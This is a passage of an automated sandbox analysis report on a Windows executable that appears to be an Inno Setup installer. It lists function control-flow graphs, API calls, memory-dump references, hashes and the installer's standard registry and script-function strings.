                                                                                                                                                                                                                                  • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                                                                                                                                  • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00408568 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                  • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                                                                                                                                  • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423B84 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                  • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                                                                                                                                  • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045559C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                                                                                                  • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                                                                                                                                  • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042F520 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                  • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                                                                                                                                  • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046F058 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 847 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->847 848 46f095-46f09c 846->848 849 46f09e-46f0a5 846->849 856 46f101-46f12a call 403738 call 42dde4 847->856 857 46f0e8-46f0fc call 403738 call 42dec0 847->857 848->845 848->849 849->847 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 897 46f2e4-46f309 call 40b24c call 46ee44 895->897 898 46f2a5-46f2e3 call 46ee44 * 3 895->898 919 46f30b-46f316 call 47c26c 897->919 920 46f318-46f321 call 403494 897->920 898->897 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f59c call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1034 46f5a1 1017->1034 1021 46f5be-46f5c5 1019->1021 1022 46f629-46f638 1019->1022 1023 46f687-46f6bd call 494cec 1020->1023 1024 46f6df-46f6f5 RegCloseKey 1020->1024 1021->1022 1026 46f5c7-46f5eb call 430bcc 1021->1026 1029 46f63b-46f648 1022->1029 1023->1024 1026->1029 1039 46f5ed-46f5ee 1026->1039 1030 46f65f-46f678 call 430c08 call 46eeb4 1029->1030 1031 46f64a-46f657 1029->1031 1042 46f67d 1030->1042 1031->1030 1035 46f659-46f65d 1031->1035 1034->1016 1035->1020 1035->1030 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1029
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                                                                                                                                    • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$Close
                                                                                                                                                                                                                                  • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                                                                                                                                                  • API String ID: 3391052094-3342197833
                                                                                                                                                                                                                                  • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                                                                                                                                  • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00492848 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c9 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492900 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1062->1060 1079 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1079 1080 492960-49296d call 403684 1070->1080 1088 492905 1071->1088 1079->1060 1089 4929bc-4929c9 call 403684 1080->1089 1090 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1080->1090 1088->1060 1098 492a18-492a25 call 403684 1089->1098 1099 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1089->1099 1090->1060 1111 492a52-492a5f call 403684 1098->1111 1112 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1098->1112 1099->1060 1127 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1111->1127 1128 492aa0-492aad call 403684 1111->1128 1112->1060 1127->1060 1140 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1128->1140 1141 492af4-492b01 call 403684 1128->1141 1140->1060 1151 492b48-492b55 call 403684 1141->1151 1152 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1141->1152 1162 492baa-492bb7 call 403684 1151->1162 1163 492b57-492b75 call 446ff8 call 42e394 1151->1163 1152->1060 1174 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1162->1174 1175 492c31-492c3e call 403684 1162->1175 1183 492b87-492b95 GetLastError call 447278 1163->1183 1184 492b77-492b85 call 447278 1163->1184 1208 492c21-492c2c call 4470d0 1174->1208 1209 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1174->1209 1189 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1175->1189 1190 492c66-492c73 call 403684 1175->1190 1195 492b9a-492ba5 call 447278 1183->1195 1184->1195 1189->1060 1201 492c98-492ca5 call 403684 1190->1201 1202 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1190->1202 1195->1060 1217 492cdb-492ce8 call 403684 1201->1217 1218 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1201->1218 1202->1060 1208->1060 1209->1060 1227 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1217->1227 1228 492d1e 1217->1228 1218->1060 1227->1060 1228->1060
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                                                                                                                                                                  • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindSleepWindow
                                                                                                                                                                                                                                  • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                                                                                                                                  • API String ID: 3078808852-3310373309
                                                                                                                                                                                                                                  • Opcode ID: 1b144ebbc355c33b94f80a54923ab6cf3df44045a172395cf2688c46c605b401
                                                                                                                                                                                                                                  • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b144ebbc355c33b94f80a54923ab6cf3df44045a172395cf2688c46c605b401
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00483A7C Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1634 483ac8-483acc 1625->1634 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1632 483b29-483b46 1628->1632 1633 483b3d-483b44 1628->1633 1629->1630 1632->1630 1633->1630 1634->1624 1636 483ace-483ad5 call 45271c 1634->1636 1636->1624 1639 483ad7-483ae4 GetProcAddress 1636->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                                                                                                                                  • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 2230631259-2623177817
                                                                                                                                                                                                                                  • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                                                                                                                                  • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00468D88 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1688 468e84 1668->1688 1671 468e94-468eb9 call 42dd4c * 2 1669->1671 1672 468eeb-468ef2 1669->1672 1691 468ebb-468ec4 call 4314f8 1671->1691 1692 468ec9-468edb call 42dd4c 1671->1692 1674 468ef4-468f06 call 42dd4c 1672->1674 1675 468f38-468f3f 1672->1675 1689 468f16-468f28 call 42dd4c 1674->1689 1690 468f08-468f11 call 4314f8 1674->1690 1677 468f41-468f75 call 42dd4c * 3 1675->1677 1678 468f7a-468f90 RegCloseKey 1675->1678 1677->1678 1688->1669 1689->1675 1700 468f2a-468f33 call 4314f8 1689->1700 1690->1689 1691->1692 1692->1672 1704 468edd-468ee6 call 4314f8 1692->1704 1700->1675 1704->1672
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                                                                                                                                                  • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                                                                                                                                                  • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                                                                                                                                                  • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                                                                                                                                                  • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                                                                                                                                                  • %s\%s_is1, xrefs: 00468E05
                                                                                                                                                                                                                                  • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                                                                                                                                                  • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                                                                                                                                                  • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                                                                                                                                                  • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                                                                                                                                                  • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                                                                                                                                                  • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                                                                                                                                                  Memory Dump Source
